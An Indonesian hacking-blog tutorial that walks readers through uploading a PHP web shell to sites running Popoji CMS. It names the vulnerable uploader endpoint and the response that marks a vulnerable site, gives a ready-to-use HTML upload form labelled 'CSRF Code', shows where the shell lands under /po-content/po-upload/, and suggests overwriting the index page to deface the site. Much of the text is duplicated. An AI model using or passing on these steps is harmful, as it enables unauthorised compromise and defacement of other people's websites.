Cara Upload Shell di CMS Popoji
06:56
By
test
Assalamu'alaikum wr.wb Sobat Ganteng +_+
Kali ini saya ingin membagikan CCara Upload Shell di CMS Popoji=D Silahkan Ikutin Cara-Cara Ini ^_^
1. Login ke Admin Dashboard POPOJI CMS
2. Exploit : target.c0.li/po-admin/js/plugins/uploader/upload.php
Ciri2 Vuln {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
3. CSRF Code:
<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data"><input type="file" name="file"><input type="hidden" name="name" value="nama_shell_anda.php"><input type="submit" value="exploit"></form>
* save dgn ekstensi .html* lalu bukak dengan browser kalean.*lalu upload shell kalian
5. akses shell: target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php
Sekian TutorCara Upload Shell di CMS Popoji
(Sumber : dwikyjuliyansyah.blogspot.com, blog saya)
Sekian tutornya dan salam ganteng, Wassalamualaikum wr.wb :D +_+
Kali ini saya ingin membagikan CCara Upload Shell di CMS Popoji=D Silahkan Ikutin Cara-Cara Ini ^_^
1. Login ke Admin Dashboard POPOJI CMS
 |
2. Exploit : target.c0.li/po-admin/js/plugins/uploader/upload.php
Ciri2 Vuln {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
 |
| wajib Login ke halaman dashbor dlu ya, kalo mau liat ini letak bugnya |
3. CSRF Code:
<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data"><input type="file" name="file"><input type="hidden" name="name" value="nama_shell_anda.php"><input type="submit" value="exploit"></form>
* save dgn ekstensi .html* lalu bukak dengan browser kalean.*lalu upload shell kalian
 |
| lalu klik exploit |
Terus cara tau Letak Shell nye Piye Om o.O ??
4. buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..
4. buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..
 |
| tanda panah itu shell anda yang tadi di upload |
 |
| silahkan tebas index gan bila ingin di defece |
(Sumber : dwikyjuliyansyah.blogspot.com, blog saya)
Sekian tutornya dan salam ganteng, Wassalamualaikum wr.wb :D +_+
Written by Admin
ChromeGT is a modern, powerful and professional Blogger template made for your Portfolio, Business or almost any other kind of website.
0 comments: